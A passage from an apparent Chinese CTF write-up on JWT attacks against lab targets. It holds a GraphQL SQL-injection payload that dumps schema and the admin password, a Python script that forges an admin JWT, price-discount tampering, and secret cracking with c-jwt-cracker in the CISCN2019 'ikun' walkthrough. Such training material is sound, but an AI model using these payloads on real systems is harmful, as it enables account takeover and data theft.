topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g')<br>print(token)
- {"query": """{ getscoreusingnamehahaha(name: "null' union select group_concat(sql) FROM sqlite_master; --"){ score name } }"""}
- CREATE TABLE users(<br> ID INTEGER PRIMARY KEY,<br> NAME TEXT NOT NULL, <br> PASSWORD TEXT NOT NULL,<br> SCORE TEXT NOT Null <br>)
- import json<br>from jwcrypto.common import base64url_decode, base64url_encode<br>import httpx<br><br>session = httpx.Client(base_url="http://eci-2zeavdwsk859vkrseg75.cloudeci1.ichunqiu.com/")<br>session.post("/signin", json={<br> "username": "test",<br> "password": "111"<br> }<br>)<br>_ = session.cookies.get("token")<br>[header, payload, signature] = _.split('.')<br>parsed_payload = json.loads(base64url_decode(payload))<br>parsed_payload['is_admin'] = 1<br>fake_payload = base64url_encode((json.dumps(parsed_payload, separators=(',', ':'))))<br>forged_jwt = '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'<br>session.cookies.delete("token")<br>session.cookies.set("token", forged_jwt)<br><br>data = {"query": """{ getscoreusingnamehahaha(name: "null' union select password FROM users WHERE name='admin'; --"){ score name } }"""}<br>response = session.post("/graphql", data=data)<br>print(response.text)
[CISCN2019 华北赛区 Day1 Web2]ikun
进入后发现有登录和注册界面,常规操作先注册后登录
[img=720,392.56857142857143]https://img-blog.csdnimg.cn/673af6bc1a0040769accd70604db4e60.png[/img]
提示要买到lv6,下划后发现可以买等级
[img=720,476.44570891494044]https://img-blog.csdnimg.cn/e7e2cf22705742cfb3078efd83b2aad8.png[/img]
这里没有lv6,点击下一页看看仍然没有找到lv6,但发现参数是GET型传参
[img=720,503.2671490593343]https://img-blog.csdnimg.cn/471adc753fae40de949e05288ee170fe.png[/img]
这意味着我们可以写个小脚本来查找lv6所在位置发现lv3对应的代码是lv3.png,那么lv6对应的就是lv6.png
[img=720,492.1045140732873]https://img-blog.csdnimg.cn/4d9596cc10f244a8ba3af9dfcf8b7e66.png[/img]
脚本如下- import time<br>import requests<br>url = "http://8e197801-2f87-4e36-aee6-a2390b0f391e.node4.buuoj.cn:81/shop?page="<br>for i in range(1,300):<br> res = requests.get(url+str(i))<br> time.sleep(0.5)<br> if "lv6.png" in res.text:<br> print(i)<br> break
[img=720,236.65013784350464]https://img-blog.csdnimg.cn/3a7c901e63f5458e859d328d0176acce.png[/img]
181页,找到后发现价格是天价,买不起
[img=720,506.4543219512195]https://img-blog.csdnimg.cn/06faf3f3231146bc9abd03c462aa7e96.png[/img]
这里抓包看一下
[img=720,384.17049805483373]https://img-blog.csdnimg.cn/92c5ad1c68d64115809d6f2ef28eb6b8.png[/img]
发现可以修改折扣,把这个discount修改为0.00000000000001然后发包
[img=720,354.7393326439234]https://img-blog.csdnimg.cn/dcb6e769220d4ba3a078a560fce44404.png[/img]
跳转到了另一个界面但无权限访问再抓包
[img=720,496.28844863083435]https://img-blog.csdnimg.cn/65b9dd775c054ff7a4348cd4c4cb874e.png[/img]
发现JWT,解码一下(解码网站https://jwt.io/)
[img=720,343.8364077727763]https://img-blog.csdnimg.cn/b56f6dbd86ae467196fa3de42b48c09a.png[/img]
我们这里想实现修改root为admin,需要有密钥,爆破密钥可以用工具c-jwt-cracker得到,链接如下https://github.com/brendan-rius/c-jwt-cracker破解后得到密钥为1Kun
[img=720,347.3503111080889]https://img-blog.csdnimg.cn/32ae5f24e6d84b18a865acb37a0e4857.png[/img]
抓包,将得到的值赋给JWT,再发包接下来就是读取源码,然后进行Python反序列化获取最终flag,这里不再演示。
后言
JWT的靶场有很多个,我这里也只是利用了CTFhub和portswig等来进行演示,还有一些靶场例如https://jwt-lab.herokuapp.com/challenges也是比较好的,但鉴于考察点相似,这里不再演示,有兴趣的师傅可以自行尝试。然后还有就是这里的CVE漏洞的分析我主要参考了我们战队lemon大师傅的讲解,大家也可以看一下哇,视频链接如下https://www.bilibili.com/video/BV15d4y1F7i3最后的话本人也只是一个小白,如果有问题还请各位大师傅多多指教。
更多靶场实验练习、网安学习资料,请点击这里>>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
